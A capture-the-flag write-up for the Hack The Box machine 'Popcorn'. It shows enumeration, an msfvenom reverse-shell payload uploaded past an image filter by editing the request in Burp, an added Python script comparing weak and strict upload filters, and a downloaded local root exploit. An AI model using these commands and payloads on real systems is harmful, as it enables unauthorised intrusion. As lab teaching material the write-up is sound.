created by ch4p \\ 10.10.10.6
// Enumeration //
Popcorn is our introduction to web app testing, has plenty of rabbit holes to jump down, and is Linux. So it's basically a perfect box. Start things off with my favorite nmap scan. While that's running, try to browse to the IP; it should resolve. Take a look around, then open another terminal window and let's start brute-forcing directories with dirb.
note: a full scan of all 65,535 ports can take a while. Feel free to use this time to read ahead, make a coffee, or just stare at nmap.
nmap -Pn -A -p- -v 10.10.10.6 -oG /home/rp/Desktop/Popcorn/nmap
dirb http://10.10.10.6
A quick word on status codes
100-199 // Information Codes
200-299 // Success Codes
300-399 // Redirection Codes
400-499 // Client Error Codes
500-599 // Server Error Codes
So all those 200s dirb reports under /torrent/ are pages we can reach directly; let's check it out.
We've got a web page with a login and upload capability. We like this. This is good. At a glance, we can see there is a user 'Admin' who has been posting. We can note that down for later, in case we need to try out some credentials. I tried uploading directly, but it wants me to be signed in. Luckily, there's a sign-up form. Let's make an account.
And easy as that, we have an account and can upload. So let's give that a try. It wants us to upload a torrent. I'm just going to grab any old torrent file, and since Kali ships with a few handy ones, I'll use one of those.
Now we have the ability to edit this torrent and add a screenshot for it. Let's make a nice "picture" with msfvenom. The form only accepts image extensions, so we'll append .jpg to the payload's filename.
msfvenom -p php/reverse_php LHOST=10.10.14.23 LPORT=2901 > supersafe.php.jpg
Now we'll try to upload it. We'll need Burp to intercept the request and strip that .jpg extension, so get that set up as well.
I set my Burp to intercept, and submitted the screenshot, catching the request. Now we can modify it to our liking. Let’s remove the ‘.jpg’ extension, and then forward the request.
Press forward, and our form is submitted. Now we browse to /torrent/upload/ and we should see a file whose timestamp matches our upload time.
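What the Burp edit above actually changes, as an added example that is not part of the original writeup and not Torrent Hoster's code: the script below builds the multipart request the way it looks after the ".jpg" is removed (filename "supersafe.php", browser-supplied part Content-Type still "image/jpeg") and runs it through two hypothetical server-side filters. One trusts the client's Content-Type and accepts the PHP file; the other allow-lists the final extension and checks the file's magic bytes, and rejects both the edited name and the original "supersafe.php.jpg". The form field name "file", the upload path, the PHPSESSID cookie, both filter functions and the sample bytes are all assumptions made for illustration.

```python
#!/usr/bin/env python3
"""Added example for this writeup; not code from the page or from Torrent Hoster.

The form field name, upload path, cookie name and both filter functions are
assumptions for illustration, not the real application's code.
"""
import http.client
import uuid

# Assumed extension allow-list and magic bytes for the image types the form claims to accept.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

# Constructed stand-in for the msfvenom php/reverse_php output; only the leading bytes matter here.
PAYLOAD = b"/*<?php /**/ error_reporting(0); /* ...reverse_php body... */ ?>"
# Constructed JPEG header (SOI marker + JFIF APP0) standing in for a real screenshot.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16


def build_multipart(field, filename, content_type, data, boundary=None):
    """Return (body, Content-Type header) for a one-file multipart/form-data POST.

    This is the part of the request Burp lets you edit: the filename in the
    Content-Disposition line and the part's Content-Type are both chosen by the
    sender, so neither proves anything about the bytes that follow.
    """
    boundary = boundary or "----rp" + uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def weak_check(filename, content_type, data):
    """Hypothetical filter that trusts the client-supplied part Content-Type."""
    return content_type.lower().startswith("image/")


def strict_check(filename, content_type, data):
    """Allow-list the *last* extension and require image magic bytes; ignore Content-Type."""
    name = filename.rsplit("/", 1)[-1]  # drop any path component the client sends
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        return False
    return any(data.startswith(magic) for magic in IMAGE_MAGIC)


def send_upload(host, path, session_cookie, body, ctype, timeout=10):
    """POST the crafted body with the logged-in session; returns (status, Location header).

    Equivalent to pressing Forward in Burp. Host, path and cookie are assumptions.
    """
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("POST", path, body=body,
                 headers={"Content-Type": ctype, "Cookie": session_cookie,
                          "Content-Length": str(len(body))})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status, resp.getheader("Location")


def outcomes():
    """Run both filters over the three uploads discussed above: (weak, strict) per case."""
    cases = {
        "supersafe.php.jpg / image/jpeg": ("supersafe.php.jpg", "image/jpeg", PAYLOAD),
        "supersafe.php / image/jpeg (Burp edit)": ("supersafe.php", "image/jpeg", PAYLOAD),
        "shot.jpg / image/jpeg (real image)": ("shot.jpg", "image/jpeg", REAL_JPEG),
    }
    return {label: (weak_check(*args), strict_check(*args)) for label, args in cases.items()}


if __name__ == "__main__":
    body, ctype = build_multipart("file", "supersafe.php", "image/jpeg", PAYLOAD,
                                  boundary="----rpBoundary")
    print(body.decode(errors="replace"))
    for label, (weak, strict) in outcomes().items():
        print(f"{label:42} weak={weak!s:5} strict={strict}")
    # To send it for real (assumed path and cookie; needs a logged-in session):
    # print(send_upload("10.10.10.6", "/torrent/upload_file.php",
    #                   "PHPSESSID=<your session id>", body, ctype))
```

The takeaway for the defender is that the only attributes worth checking are the ones the server derives itself (the final extension after normalisation, and the bytes on disk); the filename and Content-Type in the request are attacker input, which is exactly why a single Burp edit is enough to get a PHP file past a filter that relies on them.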
Set up our listener, and we’re ready to get a shell.
I wasn’t the biggest fan of this shell, and wasn’t able to spawn a better one, so I used netcat to get a better connection.
Using Python, I spawned an interactive shell. Now we can enumerate.
// Privilege Escalation //
From our current shell, we're able to get the user flag and poke around to see if we can find a way to root.
Checking the user george's home directory reveals user.txt, our first flag. A long listing also reveals a few hidden directories, the most interesting one being .cache.
A quick Google search turns up a promising exploit. Let's go ahead and copy it to our Desktop with searchsploit, then serve it up with a Python HTTP server.
On the other side, our victim machine, we'll use wget to download the file to the /tmp directory, give it execute permissions, and attempt to run it.
The error you see on the last line (a "bad interpreter" complaint, caused by a ^M after the interpreter path on the shebang line) indicates there are Windows carriage return characters in the file. Luckily, it's a simple fix. Run the command below, then execute the file again.
sed -i -e 's/\r$//' 14339.sh
Enter the password ‘toor’ when prompted, and you have root. That easy. And last but not least, here’s our flag.